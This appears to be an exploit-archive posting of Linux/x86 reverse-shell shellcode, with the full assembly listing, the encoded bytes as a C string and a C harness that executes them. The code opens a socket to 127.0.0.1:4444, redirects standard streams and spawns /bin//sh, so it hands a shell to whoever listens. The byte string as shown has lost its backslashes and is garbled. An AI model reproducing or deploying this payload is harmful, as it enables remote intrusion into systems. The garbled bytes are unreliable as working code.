91 bytes small Linux/x86 reverse shell NULL free 127.0.0.1:4444 shellcode.

MD5 | 3db8a3b1f503151d8569756ef3829a15

# Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
# Date: 2019-10-16
# Author: bolonobolo
# Tested on: Linux x86
# Software: N/A
# CVE: N/A

/*
global _start

section .text
_start:


;socket()
xor ecx, ecx ; xoring ECX
xor ebx, ebx ; xoring EBX
mul ebx ; zeroes EAX and EDX (EBX is 0, so the product is 0)
inc cl ; ECX should be 1
inc bl
inc bl ; EBX should be 2
mov ax, 0x167 ;
int 0x80 ; call socket()

;connect() ; move the return value of socket
xchg ebx, eax ; from EAX to EBX ready for the next syscalls

; push sockaddr structure in the stack
dec cl
push ecx ; unused char (0)

; move the length of the sockaddr_in into EDX; note 0x16 is decimal 22, not 16 — connect() still succeeds because the kernel only requires addrlen >= sizeof(struct sockaddr_in) for AF_INET
mov dl, 0x16

; the ip address 1.0.0.127 could be 4.3.3.130 to avoid NULL bytes
mov ecx, 0x04030382 ; mov ip in ecx
sub ecx, 0x03030303 ; subtract 3.3.3.3 from ip
push ecx ; load the real ip in the stack
push word 0x5c11 ; port 4444
push word 0x02 ; AF_INET family
lea ecx, [esp]
; EBX still contains the socket descriptor returned by socket()
mov ax, 0x16a
int 0x80

; dup2()
xor ecx, ecx
mov cl, 0x3

dup2:
xor eax, eax
; EBX still contains the socket descriptor returned by socket()
mov al, 0x3f
dec cl
int 0x80
jnz dup2

; execve() — 25-byte sequence taken from the author's earlier polymorphic analysis
cdq ; xor edx
mul edx ; xor eax
lea ecx, [eax] ; xor ecx
mov esi, 0x68732f2f
mov edi, 0x6e69622f
push ecx ; push NULL in stack
push esi ; push hs/ in stack
push edi ; push nib// in stack
lea ebx, [esp] ; load stack pointer to ebx
mov al, 0xb ; load execve in eax
int 0x80
*/

#include
#include

/* Machine-code bytes for the listing above (the page header states 91 bytes).
 * The escape sequences are garbled in this rendering (the backslashes are
 * missing), so the literal as shown is plain ASCII text rather than the
 * encoded bytes, and strlen() on it will not report the stated length. */
unsigned char code[] =
"x31xc9x31xdbxf7xe3xfexc1xfexc3xfexc3x66xb8x67x01xcdx80x93xfexc9x51xb2x16xb9x82x03x03x04x81xe9x03x03x03x03x51x66x68x11x5cx66x6ax02x8dx0cx24x66xb8x6ax01xcdx80x31xc9xb1x03x31xc0xb0x3fxfexc9xcdx80x75xf6x99xf7xe2x8dx08xbex2fx2fx73x68xbfx2fx62x69x6ex51x56x57x8dx1cx24xb0x0bxcdx80";

/*
 * Test harness: prints the byte count of code[] and then jumps into it.
 * Reader notes:
 *  - `void main()` is non-standard C; the conforming form is `int main(void)`.
 *  - strlen() returns size_t, so `%d` is a type mismatch (`%zu` is the
 *    matching conversion).
 *  - "%dn" has lost its backslash in this rendering; the original is "%d\n".
 *  - strlen() stops at the first 0x00 byte, which is why the listing above is
 *    written NULL-free: any zero byte would truncate the reported length.
 *  - Calling through a pointer into a data array only works where the mapping
 *    holding code[] is executable; under a W^X / NX data mapping (typically
 *    the toolchain default) the call faults instead — that is the mitigation
 *    this kind of harness is exercising.
 */
void main()
{

printf("Shellcode Length: %dn", strlen(code));

int (*ret)() = (int(*)())code;   /* reinterpret the byte array as a function */

ret();

}
